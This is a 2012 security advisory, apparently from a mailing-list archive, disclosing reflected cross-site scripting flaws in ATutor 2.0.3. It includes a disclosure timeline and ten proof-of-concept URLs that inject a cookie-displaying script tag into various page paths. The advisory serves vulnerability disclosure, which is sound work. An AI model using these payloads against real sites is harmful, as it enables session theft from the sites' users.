OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
ATutor 2.0.3 Multiple XSS vulnerabilities

sschurtzdarksecurity.de
Date: Sun Jan 15 2012 - 04:00:39 CST


Advisory: ATutor 2.0.3 Multiple XSS vulnerabilities
Advisory ID: SSCHADV2012-002
Author: Stefan Schurtz
Affected Software: Successfully tested on ATutor 2.0.3
Vendor URL: http://atutor.ca
Vendor Status: informed

==========================
Vulnerability Description
==========================

ATutor 2.0.3 is prone to multiple XSS vulnerabilities

==================
PoC-Exploit
==================

http://[target]/ATutor/themes/default/tile_search/index.tmpl.php/" <script>alert(document.cookie)</script>
http://[target]/ATutor/login.php/index.php" <script>alert(document.cookie)</script>/index.php
http://[target]/ATutor/search.php/index.php" <script>alert(document.cookie)</script>/index.php
http://[target]/ATutor/password_reminder.php" <script>alert(document.cookie)</script>/index.php
http://[target]/ATutor/login.php/jscripts/infusion/" <script>alert(document.cookie)</script>/index.php
http://[target]/ATutor/login.php/mods/_standard/flowplayer/" <script>alert(document.cookie)</script>/index.php
http://[target]/ATutor/browse.php/jscripts/infusion/framework/fss/" <script>alert(document.cookie)</script>/index.php
http://[target]/ATutor/registration.php/themes/default/ie_styles.css" <script>alert(document.cookie)</script>/index.php
http://[target]/ATutor/about.php/" <script>alert(document.cookie)</script>/index.php
http://[target]/ATutor/themes/default/social/basic_profile.tmpl.php/" <script>alert(document.cookie)</script>/index.php

=========
Solution
=========

-

====================
Disclosure Timeline
====================

01-Jan-2012 - vendor informed
01-Jan-2012 - vendor feedback
15-Jan-2012 - no fix available

========
Credits
========

Vulnerabilities found and advisory written by Stefan Schurtz.

===========
References
===========

http://atutor.ca/view/3/22740/1.html
http://www.darksecurity.de/advisories/2012/SSCHADV2012-002.txt